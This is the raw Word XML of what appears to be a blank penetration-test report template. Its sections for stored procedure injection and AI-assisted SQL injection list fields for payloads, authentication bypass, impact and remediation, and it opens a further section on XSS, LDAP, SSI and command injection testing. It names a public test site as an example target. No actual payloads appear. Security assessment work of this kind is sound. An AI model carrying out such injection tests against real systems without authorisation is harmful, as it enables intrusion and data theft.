        <w:trPr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43140582" w14:textId="33377EB9" w:rsidR="00437121" w:rsidRPr="00DB0B95" w:rsidRDefault="00437121" w:rsidP="009B15B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Results Analysis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2C19B6DB" w14:textId="77777777" w:rsidR="00437121" w:rsidRDefault="00437121" w:rsidP="0043712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62D708A" w14:textId="77777777" w:rsidR="00437121" w:rsidRDefault="00437121" w:rsidP="0043712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582203D" w14:textId="77777777" w:rsidR="00437121" w:rsidRDefault="00437121" w:rsidP="0043712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2243520" w14:textId="77777777" w:rsidR="00437121" w:rsidRPr="00DB0B95" w:rsidRDefault="00437121" w:rsidP="00437121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bookmarkEnd w:id="9"/>
      <w:tr w:rsidR="00B65C4C" w:rsidRPr="00A51A96" w14:paraId="64EDEE9B" w14:textId="77777777" w:rsidTr="000D6E77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E8E8E8" w:themeFill="background2"/>
        </w:tblPrEx>
        <w:trPr>
          <w:gridBefore w:val="1"/>
          <w:gridAfter w:val="1"/>
          <w:wBefore w:w="125" w:type="dxa"/>
          <w:wAfter w:w="95" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9140" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="10248ACF" w14:textId="5A4C4D87" w:rsidR="00B65C4C" w:rsidRPr="003C713F" w:rsidRDefault="00B65C4C" w:rsidP="00972D9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7.19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B65C4C">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Perform Stored Procedure Injection</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="64308E25" w14:textId="77777777" w:rsidR="00B65C4C" w:rsidRPr="000D6E77" w:rsidRDefault="00B65C4C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55"/>
        <w:gridCol w:w="6705"/>
      </w:tblGrid>
      <w:tr w:rsidR="00B65C4C" w:rsidRPr="00DB0B95" w14:paraId="5D0A3DC1" w14:textId="77777777" w:rsidTr="006356B0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361E30DC" w14:textId="77777777" w:rsidR="00B65C4C" w:rsidRPr="00DB0B95" w:rsidRDefault="00B65C4C" w:rsidP="006356B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705" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3F4534E0" w14:textId="77777777" w:rsidR="00B65C4C" w:rsidRPr="00DB0B95" w:rsidRDefault="00B65C4C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65C4C" w:rsidRPr="00DB0B95" w14:paraId="1323C06F" w14:textId="77777777" w:rsidTr="006356B0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6CF000C8" w14:textId="77777777" w:rsidR="00B65C4C" w:rsidRPr="00DB0B95" w:rsidRDefault="00B65C4C" w:rsidP="006356B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705" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4E5AF988" w14:textId="77777777" w:rsidR="00B65C4C" w:rsidRPr="00DB0B95" w:rsidRDefault="00B65C4C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65C4C" w:rsidRPr="00DB0B95" w14:paraId="17E190A2" w14:textId="77777777" w:rsidTr="006356B0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D9A169F" w14:textId="77777777" w:rsidR="00B65C4C" w:rsidRPr="00DB0B95" w:rsidRDefault="00B65C4C" w:rsidP="006356B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705" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7B62C9B8" w14:textId="77777777" w:rsidR="00B65C4C" w:rsidRPr="00DB0B95" w:rsidRDefault="00B65C4C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65C4C" w:rsidRPr="00DB0B95" w14:paraId="53787E18" w14:textId="77777777" w:rsidTr="006356B0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76ED0194" w14:textId="77777777" w:rsidR="00B65C4C" w:rsidRPr="00DB0B95" w:rsidRDefault="00B65C4C" w:rsidP="006356B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System Commands Executed</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6705" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7D6289EA" w14:textId="77777777" w:rsidR="00B65C4C" w:rsidRPr="00DB0B95" w:rsidRDefault="00B65C4C" w:rsidP="008A7361">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="16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851DFA7" w14:textId="77777777" w:rsidR="00B65C4C" w:rsidRPr="00DB0B95" w:rsidRDefault="00B65C4C" w:rsidP="008A7361">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="16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7FDD713" w14:textId="77777777" w:rsidR="00B65C4C" w:rsidRPr="00DB0B95" w:rsidRDefault="00B65C4C" w:rsidP="008A7361">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="16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030995E" w14:textId="77777777" w:rsidR="00B65C4C" w:rsidRPr="00DB0B95" w:rsidRDefault="00B65C4C" w:rsidP="008A7361">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="16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94888" w:rsidRPr="00DB0B95" w14:paraId="378D464D" w14:textId="77777777" w:rsidTr="006356B0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08A3B7B" w14:textId="501C487E" w:rsidR="00594888" w:rsidRPr="00DB0B95" w:rsidRDefault="00594888" w:rsidP="006356B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94888">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Stored Procedures Identified</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6705" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6815E02A" w14:textId="77777777" w:rsidR="00594888" w:rsidRPr="00632E60" w:rsidRDefault="00594888" w:rsidP="0059488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32E6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59488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List if found</w:t>
            </w:r>
            <w:r w:rsidRPr="00632E6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10988CE" w14:textId="77777777" w:rsidR="00594888" w:rsidRDefault="00594888" w:rsidP="0059488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887A9E3" w14:textId="77777777" w:rsidR="00594888" w:rsidRPr="00DB0B95" w:rsidRDefault="00594888" w:rsidP="0059488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94888" w:rsidRPr="00DB0B95" w14:paraId="6DBB043B" w14:textId="77777777" w:rsidTr="006356B0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41CED3D6" w14:textId="29A9AEF3" w:rsidR="00594888" w:rsidRPr="00A07F98" w:rsidRDefault="00594888" w:rsidP="006356B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94888">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Injection Payloads Used</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6705" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="60559F58" w14:textId="77777777" w:rsidR="00594888" w:rsidRDefault="00594888" w:rsidP="0059488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59488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Bypass Authentication, Data Manipulation,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04B3C8E" w14:textId="77777777" w:rsidR="00594888" w:rsidRDefault="00594888" w:rsidP="0059488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6A186BE" w14:textId="330BFC5D" w:rsidR="00594888" w:rsidRPr="00A07F98" w:rsidRDefault="00594888" w:rsidP="0059488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94888" w:rsidRPr="00DB0B95" w14:paraId="389A2098" w14:textId="77777777" w:rsidTr="006356B0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3A9E4A23" w14:textId="1846CB89" w:rsidR="00594888" w:rsidRPr="001B44C5" w:rsidRDefault="00594888" w:rsidP="006356B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94888">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Authentication Bypass Successful?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6705" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="658F008C" w14:textId="30C39181" w:rsidR="00594888" w:rsidRDefault="00594888" w:rsidP="0059488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59488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Details of Exploit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A14E0EA" w14:textId="77777777" w:rsidR="00594888" w:rsidRDefault="00594888" w:rsidP="0059488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E05339E" w14:textId="77777777" w:rsidR="00594888" w:rsidRDefault="00594888" w:rsidP="0059488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94888" w:rsidRPr="00DB0B95" w14:paraId="5AC3F78E" w14:textId="77777777" w:rsidTr="006356B0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0BE14C27" w14:textId="7E6E8229" w:rsidR="00594888" w:rsidRPr="001B44C5" w:rsidRDefault="00FF267C" w:rsidP="006356B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F267C">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Data Manipulation Possible?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6705" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5D331AFB" w14:textId="22A0A687" w:rsidR="00594888" w:rsidRDefault="00594888" w:rsidP="0059488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FF267C" w:rsidRPr="00FF267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 Queries Executed if found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C9EEC79" w14:textId="77777777" w:rsidR="00594888" w:rsidRDefault="00594888" w:rsidP="0059488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7E296E7" w14:textId="77777777" w:rsidR="00594888" w:rsidRDefault="00594888" w:rsidP="0059488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94888" w:rsidRPr="00DB0B95" w14:paraId="7A8530EF" w14:textId="77777777" w:rsidTr="006356B0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2AFCE20C" w14:textId="77777777" w:rsidR="00594888" w:rsidRPr="007930E4" w:rsidRDefault="00594888" w:rsidP="006356B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Approach Followed</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6705" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4278A992" w14:textId="77777777" w:rsidR="00594888" w:rsidRDefault="00594888" w:rsidP="0059488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A0E1D42" w14:textId="77777777" w:rsidR="00594888" w:rsidRDefault="00594888" w:rsidP="0059488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94888" w:rsidRPr="00DB0B95" w14:paraId="4FC25038" w14:textId="77777777" w:rsidTr="006356B0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62B3375C" w14:textId="77777777" w:rsidR="00594888" w:rsidRDefault="00594888" w:rsidP="006356B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Evidence Collected</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6705" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="105FAC0D" w14:textId="77777777" w:rsidR="00594888" w:rsidRDefault="00594888" w:rsidP="0059488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[*If Any]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="41582A37" w14:textId="77777777" w:rsidR="00594888" w:rsidRDefault="00594888" w:rsidP="0059488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9F76E14" w14:textId="77777777" w:rsidR="00594888" w:rsidRDefault="00594888" w:rsidP="0059488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E58625C" w14:textId="77777777" w:rsidR="000D6E77" w:rsidRDefault="000D6E77" w:rsidP="0059488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94888" w:rsidRPr="00DB0B95" w14:paraId="0979095D" w14:textId="77777777" w:rsidTr="006356B0">
        <w:trPr>
          <w:trHeight w:val="1250"/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6C8C444A" w14:textId="57BCA1B1" w:rsidR="00594888" w:rsidRPr="00DB0B95" w:rsidRDefault="00FF267C" w:rsidP="006356B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F267C">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Impact of Exploit</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6705" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5C24C3D1" w14:textId="2541642B" w:rsidR="00594888" w:rsidRPr="00DB0B95" w:rsidRDefault="00FF267C" w:rsidP="0059488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F267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[*Unauthorized Access, Data Leakage, Privilege Escalation, etc.]</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00594888" w:rsidRPr="00DB0B95" w14:paraId="297AFB46" w14:textId="77777777" w:rsidTr="006356B0">
        <w:trPr>
          <w:trHeight w:val="1250"/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0368DF80" w14:textId="77777777" w:rsidR="00594888" w:rsidRPr="00DB0B95" w:rsidRDefault="00594888" w:rsidP="006356B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Remediation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6705" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6952D324" w14:textId="77777777" w:rsidR="00594888" w:rsidRPr="00DB0B95" w:rsidRDefault="00594888" w:rsidP="0059488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94888" w:rsidRPr="00DB0B95" w14:paraId="4A3EFF69" w14:textId="77777777" w:rsidTr="006356B0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6E06752F" w14:textId="77777777" w:rsidR="00594888" w:rsidRPr="00DB0B95" w:rsidRDefault="00594888" w:rsidP="006356B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Tools/Services Used</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6705" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="08CA743A" w14:textId="77777777" w:rsidR="00594888" w:rsidRPr="00DB0B95" w:rsidRDefault="00594888" w:rsidP="008A7361">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="16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9D99B21" w14:textId="77777777" w:rsidR="00594888" w:rsidRPr="00DB0B95" w:rsidRDefault="00594888" w:rsidP="008A7361">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="16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C211476" w14:textId="77777777" w:rsidR="00594888" w:rsidRPr="00DB0B95" w:rsidRDefault="00594888" w:rsidP="008A7361">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="16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C1AB3AE" w14:textId="77777777" w:rsidR="00594888" w:rsidRPr="00DB0B95" w:rsidRDefault="00594888" w:rsidP="008A7361">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="16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76BF89F" w14:textId="77777777" w:rsidR="00594888" w:rsidRPr="00DB0B95" w:rsidRDefault="00594888" w:rsidP="008A7361">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="16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42DC081" w14:textId="77777777" w:rsidR="00594888" w:rsidRPr="00DB0B95" w:rsidRDefault="00594888" w:rsidP="0059488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94888" w:rsidRPr="00DB0B95" w14:paraId="38821145" w14:textId="77777777" w:rsidTr="006356B0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6DD94438" w14:textId="77777777" w:rsidR="00594888" w:rsidRPr="00DB0B95" w:rsidRDefault="00594888" w:rsidP="006356B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Results Analysis</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6705" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="431B19D2" w14:textId="77777777" w:rsidR="00594888" w:rsidRDefault="00594888" w:rsidP="0059488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1BA6256" w14:textId="77777777" w:rsidR="00594888" w:rsidRDefault="00594888" w:rsidP="0059488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65B36EF" w14:textId="77777777" w:rsidR="00594888" w:rsidRDefault="00594888" w:rsidP="0059488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45769C8" w14:textId="77777777" w:rsidR="00594888" w:rsidRPr="00DB0B95" w:rsidRDefault="00594888" w:rsidP="0059488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0CC70A75" w14:textId="249AF5F8" w:rsidR="003B08B6" w:rsidRDefault="003B08B6" w:rsidP="000947B4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CD10E8" w:rsidRPr="00A51A96" w14:paraId="2E7D60CD" w14:textId="77777777" w:rsidTr="006356B0">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9230" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="6A2BD453" w14:textId="5EEDACD7" w:rsidR="00CD10E8" w:rsidRPr="003C713F" w:rsidRDefault="00CD10E8" w:rsidP="00972D9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7.20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CD10E8">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Perform SQL Injection using AI</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="26215463" w14:textId="77777777" w:rsidR="00CD10E8" w:rsidRPr="006356B0" w:rsidRDefault="00CD10E8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55"/>
        <w:gridCol w:w="6705"/>
      </w:tblGrid>
      <w:tr w:rsidR="00CD10E8" w:rsidRPr="00DB0B95" w14:paraId="709BA5BC" w14:textId="77777777" w:rsidTr="001344A9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8BFFE07" w14:textId="77777777" w:rsidR="00CD10E8" w:rsidRPr="00DB0B95" w:rsidRDefault="00CD10E8" w:rsidP="001344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705" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="58813A05" w14:textId="77777777" w:rsidR="00CD10E8" w:rsidRPr="00DB0B95" w:rsidRDefault="00CD10E8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D10E8" w:rsidRPr="00DB0B95" w14:paraId="422B9DDC" w14:textId="77777777" w:rsidTr="001344A9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1D1FFE99" w14:textId="77777777" w:rsidR="00CD10E8" w:rsidRPr="00DB0B95" w:rsidRDefault="00CD10E8" w:rsidP="001344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705" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6F76F897" w14:textId="77777777" w:rsidR="00CD10E8" w:rsidRPr="00DB0B95" w:rsidRDefault="00CD10E8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D70F3" w:rsidRPr="00DB0B95" w14:paraId="2A7484C3" w14:textId="77777777" w:rsidTr="001344A9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6ABD28F5" w14:textId="12B70F0C" w:rsidR="00DD70F3" w:rsidRPr="00DB0B95" w:rsidRDefault="00DD70F3" w:rsidP="001344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D70F3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URL &amp; Injected Parameter</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6705" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="425350C4" w14:textId="06D4CCCA" w:rsidR="00DD70F3" w:rsidRPr="00D361A2" w:rsidRDefault="00DD70F3" w:rsidP="00DD70F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D361A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D361A2" w:rsidRPr="00D361A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Example: http://testphp.vulnweb.com/listproducts.php?cat=1]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0489A1C6" w14:textId="77777777" w:rsidR="00D361A2" w:rsidRDefault="00D361A2" w:rsidP="00DD70F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5D93FE1" w14:textId="4D8BA925" w:rsidR="00D361A2" w:rsidRPr="00DB0B95" w:rsidRDefault="00D361A2" w:rsidP="00DD70F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D70F3" w:rsidRPr="00DB0B95" w14:paraId="0B38B15B" w14:textId="77777777" w:rsidTr="001344A9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44E7C98D" w14:textId="442B11ED" w:rsidR="00DD70F3" w:rsidRPr="00DB0B95" w:rsidRDefault="00DD70F3" w:rsidP="001344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D70F3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AI-Based Automation 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Tools Used </w:t>
            </w:r>
            <w:r w:rsidRPr="00DD70F3">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>for SQL Injection</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6705" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0B2BF640" w14:textId="1885E128" w:rsidR="00DD70F3" w:rsidRPr="00632E60" w:rsidRDefault="00DD70F3" w:rsidP="00DD70F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32E6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DD70F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ShellGPT, Custom Prompts, Automated Scripting, etc.</w:t>
            </w:r>
            <w:r w:rsidRPr="00632E6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092A86D" w14:textId="77777777" w:rsidR="00DD70F3" w:rsidRDefault="00DD70F3" w:rsidP="00DD70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55439C3" w14:textId="77777777" w:rsidR="00DD70F3" w:rsidRPr="00DB0B95" w:rsidRDefault="00DD70F3" w:rsidP="00DD70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D70F3" w:rsidRPr="00DB0B95" w14:paraId="12CAB6F9" w14:textId="77777777" w:rsidTr="001344A9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18F8966D" w14:textId="53E5E2BD" w:rsidR="00DD70F3" w:rsidRPr="00A07F98" w:rsidRDefault="001A1246" w:rsidP="001344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A1246">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Scripts or Prompts Used for Automation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6705" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4FDDB593" w14:textId="77777777" w:rsidR="00DD70F3" w:rsidRDefault="00DD70F3" w:rsidP="00DD70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78BA1CC" w14:textId="77777777" w:rsidR="00DD70F3" w:rsidRPr="00A07F98" w:rsidRDefault="00DD70F3" w:rsidP="00DD70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D70F3" w:rsidRPr="00DB0B95" w14:paraId="2C01BF60" w14:textId="77777777" w:rsidTr="001344A9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05DA3A37" w14:textId="7D1D9D00" w:rsidR="00DD70F3" w:rsidRPr="001B44C5" w:rsidRDefault="001A1246" w:rsidP="001344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A1246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SQL Injection </w:t>
            </w:r>
            <w:r w:rsidR="00DD70F3" w:rsidRPr="00594888">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Successful?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6705" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1FF7F599" w14:textId="77777777" w:rsidR="00DD70F3" w:rsidRDefault="00DD70F3" w:rsidP="00DD70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59488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Details of Exploit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695A91B" w14:textId="77777777" w:rsidR="00DD70F3" w:rsidRDefault="00DD70F3" w:rsidP="00DD70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6851EF7" w14:textId="77777777" w:rsidR="00DD70F3" w:rsidRDefault="00DD70F3" w:rsidP="00DD70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D70F3" w:rsidRPr="00DB0B95" w14:paraId="75CAC857" w14:textId="77777777" w:rsidTr="001344A9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6D35B8DA" w14:textId="77777777" w:rsidR="00DD70F3" w:rsidRPr="007930E4" w:rsidRDefault="00DD70F3" w:rsidP="001344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Approach Followed</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6705" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="410172B0" w14:textId="77777777" w:rsidR="00DD70F3" w:rsidRDefault="00DD70F3" w:rsidP="00DD70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F99AE90" w14:textId="77777777" w:rsidR="00DD70F3" w:rsidRDefault="00DD70F3" w:rsidP="00DD70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D70F3" w:rsidRPr="00DB0B95" w14:paraId="4BC935C1" w14:textId="77777777" w:rsidTr="001344A9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7F749F86" w14:textId="77777777" w:rsidR="00DD70F3" w:rsidRDefault="00DD70F3" w:rsidP="001344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Evidence Collected</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6705" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3818C381" w14:textId="77777777" w:rsidR="00DD70F3" w:rsidRDefault="00DD70F3" w:rsidP="00DD70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[*If Any]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2910EE07" w14:textId="77777777" w:rsidR="00DD70F3" w:rsidRDefault="00DD70F3" w:rsidP="00DD70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98844EF" w14:textId="77777777" w:rsidR="00DD70F3" w:rsidRDefault="00DD70F3" w:rsidP="00DD70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D70F3" w:rsidRPr="00DB0B95" w14:paraId="3B8CDBDC" w14:textId="77777777" w:rsidTr="001344A9">
        <w:trPr>
          <w:trHeight w:val="1250"/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7C05B17A" w14:textId="31B0F4A6" w:rsidR="00DD70F3" w:rsidRPr="00DB0B95" w:rsidRDefault="007610D9" w:rsidP="001344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610D9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Potential Security Risks Identified</w:t>
            </w:r>
            <w:r w:rsidRPr="007610D9">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:tab/>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6705" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="017689B0" w14:textId="77777777" w:rsidR="00DD70F3" w:rsidRPr="00DB0B95" w:rsidRDefault="00DD70F3" w:rsidP="00DD70F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610D9" w:rsidRPr="00DB0B95" w14:paraId="17780D06" w14:textId="77777777" w:rsidTr="001344A9">
        <w:trPr>
          <w:trHeight w:val="1250"/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0EE3F52C" w14:textId="6CA65320" w:rsidR="007610D9" w:rsidRDefault="007610D9" w:rsidP="001344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Remediation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6705" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5A415573" w14:textId="77777777" w:rsidR="007610D9" w:rsidRPr="00DB0B95" w:rsidRDefault="007610D9" w:rsidP="00DD70F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D70F3" w:rsidRPr="00DB0B95" w14:paraId="2D56CA3A" w14:textId="77777777" w:rsidTr="001344A9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355521D0" w14:textId="77777777" w:rsidR="00DD70F3" w:rsidRPr="00DB0B95" w:rsidRDefault="00DD70F3" w:rsidP="001344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Results Analysis</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6705" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1DFF04BA" w14:textId="77777777" w:rsidR="00DD70F3" w:rsidRDefault="00DD70F3" w:rsidP="00DD70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B651714" w14:textId="77777777" w:rsidR="00DD70F3" w:rsidRDefault="00DD70F3" w:rsidP="00DD70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0334D5B" w14:textId="77777777" w:rsidR="00DD70F3" w:rsidRDefault="00DD70F3" w:rsidP="00DD70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B2B75E5" w14:textId="77777777" w:rsidR="00DD70F3" w:rsidRPr="00DB0B95" w:rsidRDefault="00DD70F3" w:rsidP="00DD70F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311122D2" w14:textId="73B08E31" w:rsidR="00FC3E47" w:rsidRDefault="00FC3E47" w:rsidP="001943CB">
      <w:pPr>
        <w:spacing w:before="120" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1FC80125" w14:textId="3C35267F" w:rsidR="00510813" w:rsidRDefault="00510813" w:rsidP="00510813">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r w:rsidRPr="00510813">
        <w:t>Test 8: Techniques for Identifying and Testing Injection Vulnerabilities</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F188CF4" w14:textId="6908FA62" w:rsidR="002E7F59" w:rsidRPr="002E7F59" w:rsidRDefault="002E7F59" w:rsidP="000947B4">
      <w:pPr>
        <w:spacing w:before="120" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002E7F59">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">[*This section includes different </w:t>
      </w:r>
      <w:r w:rsidR="001344A9">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>techniques for</w:t>
      </w:r>
      <w:r w:rsidRPr="002E7F59">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> testing additional injection attacks, such as XSS, LDAP, SSI, and command injection</w:t>
      </w:r>
      <w:r w:rsidR="00E55E90">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="002E7F59">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EA1BBE1" w14:textId="6309E5FC" w:rsidR="00B60618" w:rsidRDefault="00B60618" w:rsidP="000947B4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B60618" w:rsidRPr="00A51A96" w14:paraId="4865DB93" w14:textId="77777777" w:rsidTr="001344A9">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9230" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="6DB15DBC" w14:textId="0AF96740" w:rsidR="00B60618" w:rsidRPr="003C713F" w:rsidRDefault="00B60618" w:rsidP="00972D9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8.1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B60618">
